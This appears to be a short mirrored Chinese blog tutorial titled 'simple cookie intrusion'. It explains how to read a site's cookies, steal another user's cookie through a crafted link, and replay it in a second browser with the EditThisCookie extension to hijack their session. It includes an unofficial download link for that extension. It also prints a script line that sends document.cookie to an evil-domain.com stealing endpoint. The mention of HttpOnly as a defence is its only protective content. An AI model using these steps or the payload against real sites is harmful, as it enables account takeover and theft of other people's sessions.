简单cookie入侵 - 走看看

zoukankan html css js c++ java

简单cookie入侵

在当前网站，按下F12键进入开发者模式，在console控制台输入：document.cookie获取cookie值如：

复制你得到cookie值，你或通过每种方式获取Cookie，例如：当别人点击你的链接时在参数后加&docment.cookie，

换一个浏览器，打开上面获得cookie的网站并点击EditThisCookie,将相应的key和值加入进去，刷新网页，就可以侵入成功了（注意 Cookie的有效期）

EditThisCookie是谷歌chrome的扩展插件，可以到Chrome扩展商店下载安装，如果不想翻墙则可以到以下下载完后将解压的文件拖进扩展程序即可：

https://pan.baidu.com/s/13lrP4aDXfIhCLCn2Fp217Q

new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
上面是跨站点载入的一个恶意脚本的代码，能够将当前网页的 Cookie 发往第三方服务器。如果设置了一个 Cookie 的HttpOnly属性，上面代码就不会读到该 Cookie

查看全文

相关阅读:
【SAS NOTE】OUTPUT
【SAS NOTES】_NULL_
【SAS NOTE】sas 9.2 安装
 【SAS NOTE】FREQ
纯数学教程 Page 203 例XLI (1)
纯数学教程 Page 203 例XLI (3)
纯数学教程 Page 203 例XLI (2)
Prove Cauchy's inequality by induction
纯数学教程 Page 325 例LXVIII (15) 调和级数发散
 纯数学教程 Page 325 例LXVIII (15) 调和级数发散

原文地址：https://www.cnblogs.com/jing-tian/p/10993814.html

Copyright © 2011-2022 走看看